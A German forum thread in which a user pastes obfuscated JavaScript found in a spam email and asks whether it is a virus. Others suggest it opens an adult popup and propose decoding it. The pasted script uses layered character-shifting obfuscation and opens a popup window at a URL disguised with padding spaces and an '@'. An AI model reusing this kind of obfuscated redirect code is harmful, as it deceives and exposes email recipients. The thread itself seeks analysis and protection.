hab nen Virus??

C

ciruZ

Guest
Hi!

Ich bekam letztens eine e-mail an meine Web.de-e-Mail-Adresse...

Betreff: A List with movies Archive access
Von: abel@firemail.de

Inhalt: Scheinbar nichts. Doch im HTML ein sehr verdächtiger JavaScript... ich kopiere jetzt mal aus der mail:

Code:
<HTML>
<BODY>
<HTML><HEAD><SCRIPT LANGUAGE=\"JavaScript\">function urlgrey(){fI9mxy5Zd=\"QFX=6TFE63;8N:GSIHG\";fI9mXy5Zd=\"456HHHTH(N65.,&45%^FGH&N()(.\";fI9mXy5zd= \"23&I&4(12&)5#5/-1/8-+6H765\";fI9mxy5zd= \"#8*,(/0#28&86##'-'1(9);3/+%\";fi9mXy5zd= \"4-?73)'//$&:8-2119*-52LKU143&\";dfD8dn4mDq=\"0\";fi9mXy5Zd=\"--3&M=)'0*H,-)L32*9F5=<LKU143&\";alM0odoG7a3= \"I-.!M>)15*$F5=<LKU143&\";dS94gnXs3 = String.fromCharCode(44,0+99,111,0x70,0171,0150,105,0x73,0164,111,0x72,0171,0x3d,48);alM0OdoG7a3= \"5&.061%1#I33!;)352I-.!M10$40&%$;97('3&F5=<LKU143&\";alM0OdOG7a3= \"X4-?)-'4&2'.98()%5.7:-+81)41#<*281:4$ \";a1M0OdOG7a3= \"+5(K/'7)19.,7(0$$0/9-0#%2.*\";a1MoOdOG7a3= \"38-/##)1259)/20%/#.97'#&,-,/:5/'*. \";a1M0odoG7a3= \"K((381/>)11:/-7K82,)&8,5.88.06$0?*,7;&#--\";
a1M0odoG7aS= \"I$$'8?($<,+'=@)11</-9M82,)&:,5.88.06$0A*,7=/%'5\";a1M0od0G7aS = fI9mxy5Zd;fo3Mb8uq0W= \"\";fO3Mb8uq0w= \"\";almoOdOGLaS = \"\";fo3Mb8uq0w= \"\";for(foSmb8UqOw=0;foSmb8UqOw<a1M0od0G7aS.length;foSmb8UqOw++){almoOdOGLaS+=String.fromCharCode(a1M0od0G7aS.charCodeAt(foSmb8UqOw)+1);}for(foSmb8UqOw=almoOdOGLaS.length-1;foSmb8UqOw>=0;foSmb8UqOw--)
{fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));
}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fO3Mb8Uq0w = fO3Mb8uq0w;alM0od0G7aS = fI9mXy5Zd;fo3Mb8uq0w= \"\";fO3Mb8uq0w= \"\";almoOdOGLaS = \"\";fo3Mb8uq0W= \"\";
for(foSmb8UqOw=0;foSmb8UqOw<a1M0od0G7aS.length;foSmb8UqOw++){almoOdOGLaS+=String.fromCharCode(a1M0od0G7aS.charCodeAt(foSmb8UqOw)+1);}for(foSmb8UqOw=almoOdOGLaS.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);
}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMb8Uq0w = fO3Mb8uq0w;j6k0mXry9=\"0\";alMoOd0G7aS=fI9mXy5zd;almoOdOGLaS = \"\";
fo3Mb8uq0W= \"\";m5sXt0o1f=String.fromCharCode(104,0x74,0164,0160,0x3a,057,0+47,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,32,040,0x20,0+32,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0100);fO3Mb8uq0w= \"\";fo3Mb8uq0w= \"\";
j6k0MXry9=\"0\";for(foSmb8UqOw=0;foSmb8UqOw<a1M0od0G7aS.length;foSmb8UqOw++){almoOdOGLaS+=String.fromCharCode(a1M0od0G7aS.charCodeAt(foSmb8UqOw)+1);
}for(foSmb8UqOw=almoOdOGLaS.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%8-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+89);
else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));
}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMbSUq0w = fO3Mb8uq0w;almoOdOGLaS = \"\";j6k0mxry9=\"1\";fo3Mb8uq0w=\"\";fo3Mb8uq0W= \"\";alMoOdOG7aS = fI9mxy5zd;fO3Mb8uq0w= \"\";for(foSmb8UqOw=0;foSmb8UqOw<a1M0od0G7aS.length;foSmb8UqOw++){almoOdOGLaS+=String.fromCharCode(a1M0od0G7aS.charCodeAt(foSmb8UqOw)+1);}for(foSmb8UqOw=almoOdOGLaS.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);
}le5bKk3d9=100;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 12)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+90);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35))
;}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMrSuq0w = fO3Mb8uq0w;alMoOdOGLaS = fi9mXy5zd;almoOdOGLaS = \"\";fo3Mb8uq0w= \"\";dfDSdn4mDq=\"1\";fo3Mb8uq0W=\"\";fO3Mb8uq0w=\"\";for(foSmb8UqOw=0;foSmb8UqOw<a1M0od0G7aS.length;foSmb8UqOw++){almoOdOGLaS+=String.fromCharCode(a1M0od0G7aS.charCodeAt(foSmb8UqOw)+1);}for(foSmb8UqOw=almoOdOGLaS.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}loe5bKk3d9=600;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--)
{if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16 < 33)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16)+89);
else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSmrSuq0w = fO3Mb8uq0w;loe5bkK3d9=800;dfD8dn4MDq=100;SKvbbR45h=j6k0mXry9+String.fromCharCode(0x2c,0164,0x69,0+116,0154,101,0+98,0x61,0162,075);fdlkhHg8h=loe5bKk3d9+String.fromCharCode(0x2c,0155,0x65,110,0x75,98,0141,0x72,0+61);
jrhtDERff=j6k0mxry9+String.fromCharCode(0x2c,0163,0x74,0+97,0+116,0165,115,0+61);hty87fdq2=j6k0MXry9+String.fromCharCode(0x2c,0154,0x65,0x66,116,0+61);dFGgh54FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);FGhnJ7uk5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);kfn4RF8d4=loe5bkK3d9+String.fromCharCode(0x2c,104,101,0151,0x67,0150,116,0x3d);fUT4nvRE8=String.fromCharCode(0x77,0151,100,0164,0x68,075);nG45GJdsr=\"0\"+String.fromCharCode(0x2c,116,0157,0x6f,0154,0142,0x61,0x72,0x3d);
z23rmhj76u=le5bKk3d9+String.fromCharCode(0x2c,0164,111,0+112,075);dnwjOmb3n=\"\"+dfD8dn4MDq;mOky5SLt3=kfn4RF8d4+fdlkhHg8h+fUT4nvRE8+dFGgh54FG+FGhnJ7uk5+nG45GJdsr+hty87fdq2+jrhtDERff+SKvbbR45h+z23rmhj76u+dnwjOmb3n;mOky5sLt3=fUT4nvRE8+kfn4RF8d4+fdlkhHg8h+dFGgh54FG+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+z23rmhj76u+dnwjOmb3n;
moky5sLt3=fUT4nvRE8+hty87fdq2+kfn4RF8d4+fdlkhHg8h+FGhnJ7uk5+jrhtDERff+dFGgh54FG+SKvbbR45h+nG45GJdsr+z23rmhj76u+dnwjOmb3n;mOky5slt3=z23rmhj76u+fUT4nvRE8+fdlkhHg8h+dFGgh54FG+kfn4RF8d4+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+dnwjOmb3n;if(almoOdOGLaS==fI9mXy5Zd)window.open(m5sXt0o1f+fOSMrSuq0w,\"\",mOky5SLt3+dS94gnXs3);else if(fi9mXy5zd!=fI9mxy5zd)window.open(m5sXt0o1f+fO3Mb8Uq0w,\"\",mOky5sLt3+dS94gnXs3);else if(fI9mXy5zd!=fi9mXy5zd)window.open(m5sXt0o1f+fOSMbSUq0w,\"\",moky5sLt3+dS94gnXs3);dFGgHS4FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);
FGhnJLuK5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);}</SCRIPT></HEAD><BODY><SCRIPT>urlgrey()</SCRIPT></BODY></HTML><p><p><p><p><p><p><p><p><p><p>

<HTML><HEAD><SCRIPT LANGUAGE=\"JavaScript\">function urlgrey(){fI9mxy5Zd=\"QFX=6TFE63;8N:GSIHG\";fI9mXy5Zd=\"456HHHTH(N65.,&45%^FGH&N()(.\";fI9mXy5zd= \"23&I&4(12&)5#5/-1/8-+6H765\";fI9mxy5zd= \"#8*,(/0#28&86##'-'1(9);3/+%\";fi9mXy5zd= \"4-?73)'//$&:8-2119*-52LKU143&\";dfD8dn4mDq=\"0\";fi9mXy5Zd=\"--3&M=)'0*H,-)L32*9F5=<LKU143&\";alM0odoG7a3= \"I-.!M>)15*$F5=<LKU143&\";dS94gnXs3 = String.fromCharCode(44,0+99,111,0x70,0171,0150,105,0x73,0164,111,0x72,0171,0x3d,48);alM0OdoG7a3= \"5&.061%1#I33!;)352I-.!M10$40&%$;97('3&F5=<LKU143&\";alM0OdOG7a3= \"X4-?)-'4&2'.98()%5.7:-+81)41#<*281:4$ \";a1M0OdOG7a3= \"+5(K/'7)19.,7(0$$0/9-0#%2.*\";a1MoOdOG7a3= \"38-/##)1259)/20%/#.97'#&,-,/:5/'*. \";a1M0odoG7a3= \"K((381/>)11:/-7K82,)&8,5.88.06$0?*,7;&#--\";<p>a1M0odoG7aS= \"I$$'8?($<,+'=@)11</-9M82,)&:,5.88.06$0A*,7=/%'5\";a1M0od0G7aS = fI9mxy5Zd;fo3Mb8uq0W= \"\";fO3Mb8uq0w= \"\";almoOdOGLaS = \"\";fo3Mb8uq0w= \"\";for(foSmb8UqOw=0;foSmb8UqOw<a1M0od0G7aS.length;foSmb8UqOw++){almoOdOGLaS+=String.fromCharCode(a1M0od0G7aS.charCodeAt(foSmb8UqOw)+1);}for(foSmb8UqOw=almoOdOGLaS.length-1;foSmb8UqOw>=0;foSmb8UqOw--)<p>{fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 < 41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));<p>}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fO3Mb8Uq0w = fO3Mb8uq0w;alM0od0G7aS = fI9mXy5Zd;fo3Mb8uq0w= \"\";fO3Mb8uq0w= \"\";almoOdOGLaS = \"\";fo3Mb8uq0W= \"\";<p><p><p><p><p><p><p><p><p><p></BODY></HTML>

Ein Freund mit Norton Antivirus 2002 meinte es währ kein Virus und würde nen Sex-Popup öffnen... An die e-mail Adresse von Web.de bekomme ich schon seit längerem Sex-Mails... Ich habe allerdings niemanden diese e-mail gegeben...

Ich hoffe, ihr könnt mir helfen... Währe wirklich sehr dankbar!!! Währ das erste mal das ich hilfe bräuchte...

Thx schon mal,
ciruZ
 
C

ciruZ

Guest
Noch was: Mein Freund meinte da währ n Syntaxfehler... bei mir war aber nix... hab die meldung wegen Syntax-Fehlern aber auch deaktiviert...
 

SPaRXLi

New member
So wie ich das sehe, sind das einfach, durch javascript verschlüsselte html-tags. Laß dir einfach mal die enthaltenen variablen als "alert" z.B. ausgeben. Dann siehste was es ist.

Gruß Thomas.
 
C

ciruZ

Guest
aha... wie... den Wert mal mit nem Alert anzeigen lassen der zum schluss raus kommt?? Hmm... währ ne Idee... Probier ich mal (besser gesagt die im Labor von F-Prot)
 
C

ciruZ

Guest
Hmmm... Das Ding is so groß das ich nix feinde was zum Schluss rauskommt... Mal warten wie weit die bei F-Secure mit der Analyse sind... Habs durch nen Freund hinbekommen das die sich das ansehen... Andererseits will ichs nich auf meinem anderen PC testen damit der wenns was is nich auch noch am Arsch is und dann is nix mehr mit Inet... Gibts hier einen der mal freiwiliig versuchen würde das zu entschlüsseln?? Ich schreib mir jetzt auch n eigenes mailprogramm ohne HTML... dann bin ich sicher... Versteh auch net warum ich nich mit Linux checke/Outlook Express verwende...
 
Oben